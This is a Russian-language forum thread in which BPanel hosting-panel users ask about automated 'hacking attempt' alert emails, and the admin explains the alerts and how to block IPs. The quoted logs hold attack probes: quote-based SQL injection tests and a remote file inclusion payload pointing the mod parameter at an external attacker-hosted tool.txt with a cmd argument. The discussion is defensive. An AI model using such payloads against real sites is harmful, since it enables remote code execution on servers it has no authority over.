Произведена попытка взлома скрипта BPanel

[Help]

Мне вот систиматически(примерно 2 раза в сутки) приходят письма подобного содержания:

 

---------------

Уважаемый Администратор,

 

Была произведена попытка взлома скрипта BPanel!

 

Модуль : /order/faq.php?category=2\'

Referrer :

 

IP Адрес : 195.5.58.108

Прокси :

Браузер : Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.12) Gecko/20051013 Firefox/1.0.7

 

Windows :

Язык : en-us,en;q=0.5

---------------

 

Меняется поле модуль. Вот примеры:

---------------

Модуль : /order/index.php?mod=findpass

Модуль : /order/index.php?mod=findpass&send=ye-

Модуль : /order/index.php?mod=findpass&send=yes\'

Модуль : /order/faq.php?category=2\'

---------------

 

Скажите мне, это дейстивительно попытки взлома?

 

У меня такой вариант был, когда я сам работал как клиент на своей панели был сбой связи и я нажал Ф5. Мне как админу пришло письмо подобного содержания.

 

Хотел узнать это взлом или люди давят Ф5. И стоит ли их АйПи заносить в Блок Лист.

 

а?

[admin]

Модуль : /order/index.php?mod=findpass&send=ye-

Модуль : /order/index.php?mod=findpass&send=yes\'

Модуль : /order/faq.php?category=2\'

Скажите мне, это дейстивительно попытки взлома?

Похоже на то.

У меня такой вариант был, когда я сам работал как клиент на своей панели был сбой связи и я нажал Ф5. Мне как админу пришло письмо подобного содержания.

 

Хотел узнать это взлом или люди давят Ф5. И стоит ли их АйПи заносить в Блок Лист.

а?

Частенько также бывают и ложные тревоги.

Решать: работать с защитой иль нет -- только Вам.

[Help]

У меня каждый день бывают попытки взлома по 1-3 раза.

 

У кого-нить такое бывает или только у меня???

 

Вот вчера пришло сообщение типа:

---------

Была произведена попытка взлома скрипта BPanel!

 

Модуль : http://www.********.bz/order/host.php?mod=....txt?&&s=r&cmd=

Referrer :

 

IP Адрес : 201.58.126.9*

Прокси :

Браузер :

 

Windows :

Язык :

---------

 

И еще... Блокирую АйПи адреса в панели>Безопасность

Но чо-то опять приходят письма что с этого АйПи типа пытались поломать.

 

Может чо я не так установил или настроил систему.....

 

Или очень уж кому-нить мешает мой сайт с моими услугами....

[admin]

У меня каждый день бывают попытки взлома по 1-3 раза.

 

У кого-нить такое бывает или только у меня???

Некий баран думает, что в переменную mod можно всунуть файл http://xpl.netmisphere2.com/tool.txt?&&s=r&cmd= и что на уровне скрипта данная переменная не фильтруется

И еще... Блокирую АйПи адреса в панели>Безопасность

Но чо-то опять приходят письма что с этого АйПи типа пытались поломать.

 

Может чо я не так установил или настроил систему.....

 

Или очень уж кому-нить мешает мой сайт с моими услугами....

Включить блокировку по IP адресу: YES

IP Адреса для блокировки (по одному в строку): СЮДА IP

[SWHost]

хех..тупость.. ничего это не даёт..таким образом пароли не получишь..наивные "взломщики"....

[Help]

Раньше через Билинг блокировал АйПи адреса.

 

Но все равно с того же АйПи повторялись попытки....

 

Стал блокировать через CPanel, теперь попытки прекратились почти. АйПи не повторяются.

[admin]

В коде скрипта сначала идет проверка на взлом, а только потом блокировка по IP.